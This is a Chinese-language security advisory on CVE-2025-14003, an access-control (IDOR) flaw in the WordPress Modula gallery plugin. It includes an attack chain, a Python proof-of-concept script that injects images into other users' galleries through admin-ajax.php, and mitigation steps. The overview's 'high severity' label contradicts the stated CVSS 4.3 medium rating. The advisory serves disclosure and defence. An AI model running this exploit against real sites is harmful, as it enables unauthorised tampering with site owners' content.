CVE-2025-14003 WordPress Modula图库插件权限绕过漏洞

漏洞信息

漏洞编号

CVE-2025-14003

漏洞类型

权限绕过/IDOR

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Image Gallery – Photo Grid & Video Gallery (Modula) 插件

漏洞概述

CVE-2025-14003是WordPress平台下Image Gallery – Photo Grid & Video Gallery插件（也称为Modula）中的一个高危安全漏洞。该漏洞属于不安全的直接对象引用（IDOR）类型，是典型的Broken Access Control（访问控制失效）问题。漏洞根源在于add_images_to_gallery_callback()函数缺少权限检查，导致低权限认证用户（如Author角色）可以修改其他用户拥有的图库数据。具体而言，具有Author级别权限的认证攻击者可以在未经授权的情况下向其他用户拥有的任意Modula图库添加图片。此漏洞影响范围广泛，涉及所有版本直至2.13.3。由于该漏洞无需用户交互即可利用，且可被远程触发，对使用该插件的WordPress网站构成了中等程度的安全威胁，可能导致图库内容被恶意篡改或注入恶意图片。

技术细节

该漏洞的技术根源在于WordPress插件的add_images_to_gallery_callback() AJAX函数未实施适当的权限验证机制。在正常的访问控制设计中，添加图片到特定图库的操作应当验证：1）当前用户是否已登录且具有相应权限；2）当前用户是否有权向目标图库添加内容。然而该插件仅验证了用户是否登录（PR:L级别的低权限认证要求），但未验证用户与目标图库的所有权关系。攻击者只需获取Author级别账户（通过暴力破解、钓鱼或其他方式），即可利用WordPress的AJAX端点发起请求。攻击请求中携带目标图库ID（该ID可通过其他API或页面遍历获取），插件直接处理请求而不检查图库所有权。漏洞利用路径为：攻击者构造包含gallery_id参数的POST请求到wp-admin/admin-ajax.php端点，触发add_images_to_gallery_callback()函数，该函数直接根据传入的gallery_id执行数据库操作，将攻击者指定的图片添加到受害者图库中。整个过程无需目标图库所有者确认或交互，完全基于服务器端缺失的访问控制检查。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress Author级别账户（通过社会工程学、密码喷洒攻击或凭证泄露）

STEP 2

步骤2

攻击者枚举目标网站上其他用户的Modula图库ID（通过页面源码、API端点或图库列表页面）

STEP 3

步骤3

攻击者构造恶意请求，向wp-admin/admin-ajax.php发送包含add_images_to_gallery_callback操作的POST请求

STEP 4

步骤4

请求中携带目标图库ID和恶意图片URL，由于插件未验证图库所有权，服务器直接处理请求

STEP 5

步骤5

恶意图片被成功添加到受害者图库中，可能包含钓鱼内容、恶意链接或恶意软件

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-14003 PoC - Modula Gallery IDOR Vulnerability
# Target: WordPress site with Modula plugin < 2.13.4
# Author role or higher required

def add_image_to_gallery(target_url, username, password, gallery_id, image_url):
    """
    Exploit IDOR vulnerability to add image to arbitrary Modula gallery
    
    Args:
        target_url: Target WordPress site URL
        username: WordPress username with Author+ role
        password: User password
        gallery_id: Target gallery ID to inject image into
        image_url: URL of image to add to gallery
    """
    # WordPress login to get authentication cookies
    login_url = f"{target_url}/wp-login.php"
    session = requests.Session()
    
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    
    print(f"[*] Logging in as {username}...")
    login_response = session.post(login_url, data=login_data, verify=False)
    
    if 'wordpress_logged_in' not in str(session.cookies.get_dict()):
        print("[-] Login failed!")
        return False
    
    print("[+] Login successful!")
    
    # Exploit IDOR vulnerability
    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"
    
    exploit_data = {
        'action': 'add_images_to_gallery_callback',
        'gallery_id': gallery_id,  # Arbitrary gallery ID (IDOR)
        'image_url': image_url
    }
    
    print(f"[*] Exploiting IDOR vulnerability on gallery_id={gallery_id}...")
    exploit_response = session.post(ajax_url, data=exploit_data, verify=False)
    
    if exploit_response.status_code == 200:
        print("[+] Exploit sent! Image may have been added to target gallery.")
        print(f"[*] Response: {exploit_response.text}")
        return True
    else:
        print(f"[-] Exploit failed with status code: {exploit_response.status_code}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 6:
        print("Usage: python cve-2025-14003.py <target_url> <username> <password> <gallery_id> <image_url>")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    gid = sys.argv[4]
    img = sys.argv[5]
    
    add_image_to_gallery(target, user, pwd, gid, img)

影响范围

Modula Image Gallery 插件 < 2.13.4

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1）限制WordPress新用户注册，关闭公开注册功能；2）审查所有Author级别以上的用户账户，移除可疑账户；3）使用WordPress安全插件（如Wordfence）监控异常的AJAX请求；4）对图库页面实施额外的访问控制；5）考虑暂时禁用Modula插件直到完成安全更新。